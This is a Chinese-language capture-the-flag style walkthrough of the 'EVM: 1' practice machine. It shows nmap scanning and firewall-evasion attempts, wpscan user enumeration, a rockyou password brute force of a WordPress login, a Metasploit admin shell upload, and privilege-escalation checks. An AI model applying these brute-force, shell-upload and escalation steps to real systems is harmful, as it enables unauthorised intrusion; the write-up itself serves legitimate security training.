0x00 技术点
- Nmap端口扫描、目录发现、漏洞探测
- Wpscan用户枚举、密码爆破
- Meterpreter shell
- 权限提升
0x01 环境搭建
靶机信息:
- Name: EVM: 1
- Date release: 2 Nov 2019
靶机描述:
This is super friendly box intended for Beginner's This may work better with VirtualBox than VMware
下载ova镜像文件,vbox导入,设置两张虚拟网卡,分别为NAT模式和仅主机模式(改为默认网卡配置)
0x02 信息收集
主机发现
代码语言:javascript复制netdiscover -i eth0 #选择仅主机模式网口 IP At MAC Address Count Len MAC Vendor / Hostname ----------------------------------------------------------------------------- 192.168.56.1 0a:00:27:00:00:15 1 60 Unknown vendor 192.168.56.100 08:00:27:30:bc:cb 1 60 PCS Systemtechnik GmbH Kali机器的IP为 192.168.56.101 ,以上探测到的 192.168.56.100就是EVM了
端口扫描
代码语言:javascript复制nmap -sV -p- 192.168.56.101Host is up (0.00023s latency).All 65535 scanned ports on 192.168.56.100 are filtered所有端口被过滤了,怀疑EVM上设置了端口流量防火墙策略
进行 Evade Firewall/IDS扫描
代码语言:javascript复制nmap -sA 192.168.56.100 #ACK扫描nmap -sW 192.168.56.100 #TCP窗口扫描nmap -f 192.168.56.100 #报文分段nmap --spoof-mac Cisco 192.168.56.100 #伪造mac均宣告失败,这个确定是初级难度?
排查一遍之后,发现是EVM虚拟机导入的时候新增NAT网卡致使网络设置未生效,嘤嘤嘤
重新导入,重新以上步骤
代码语言:javascript复制netdisvover -i eth0
192.168.56.1 0a:00:27:00:00:15 1 60 Unknown vendor192.168.56.100 08:00:27:ca:fe:db 1 60 PCS Systemtechnik GmbH 192.168.56.103 08:00:27:6d:a5:91 3 180 PCS Systemtechnik GmbHEVM的正确IP为 192.168.56.103 ,以下进行端口扫描
代码语言:javascript复制nmap -sV -p- 192.168.56.103
PORT STATE SERVICE VERSION22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)53/tcp open domain ISC BIND 9.10.3-P4 (Ubuntu Linux)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))110/tcp open pop3 Dovecot pop3d139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)143/tcp open imap Dovecot imapd445/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)目录遍历
先使用nmap枚举一下可发现目录
代码语言:javascript复制nmap --script=http-enum 192.168.56.103
| /wordpress/: Blog| /info.php: Possible information file|_ /wordpress/wp-login.php: Wordpress login page.0x03 漏洞发现
nmap vulners
先使用nmap vuln脚本探测一下
代码语言:javascript复制nmap --script=smb-check-vulns.nse -p445 192.168.56.103nmap --script=http-enum 192.168.56.103nmap --script=samba-vuln-cve-2012-1182 -p 139 192.168.56.103均无效,使用vulners脚本检测一下是否存在CVE
代码语言:javascript复制cd /usr/share/nmap/scripts/git clone https://github.com/vulnersCom/nmap-vulners.gitgit clone https://github.com/scipag/vulscan.gitproxychains git clone https://github.com/scipag/vulscan.gitcd vulscan/utilities/updaterchmod x updateFiles.sh | ./updateFiles.sh
nmap --script nmap-vulners -sV 192.168.56.103
看起来很多,测试了最新几个CVE,均无法利用
wpscan
之前目录遍历,收集到wordpress路径,自然而然想到用wpscan探测一番
代码语言:javascript复制wpscan --url http://192.168.56.103/wordpress/ -e u -e at -e ap以上命令的含义为枚举所有用户名,安装主题、插件
发现用户:c0rrupt3d_brain
wp版本5.2.4,安装默认主题,未安装插件
搜索一下wordpress 5.2.4有无漏洞
浏览了一下基本上没有可获得shell的漏洞
0x04 漏洞利用
以上获取了wp的用户名,接下来使用wpscan对其进行密码爆破,字典当然选择Kali下最强大的字典rockyou囖
代码语言:javascript复制wpscan --url http://192.168.56.103/wordpress/ -U c0rrupt3d_brain -P /usr/share/wordlists/rockyou.txt
成功获取到c0rrupt3d_brain用户的密码:24992499
获得访问权限后,我们可以使用metasploit上集成的wpadminshell_upload上传shellcode
演示如下
0x05 权限提升
以上步骤,我们已经获得了EVM的普通用户shell,接下来做提权操作,首先提权
- 查看关键文件
- 查看内核版本:uname -r → searchsploit
- 查看计划任务:crontab -l
- 查看历史记录:cat ~/.bash_history
- 查看用户权限:sudo -l
- 使用提权脚本
先获取一个标准shell
- python一句话:python -c "import pty;pty.spawn('/bin/bash')"
查看关键文件
好家伙,一步搞定,root用户的密码是:willy26
切换root用户
到此为止
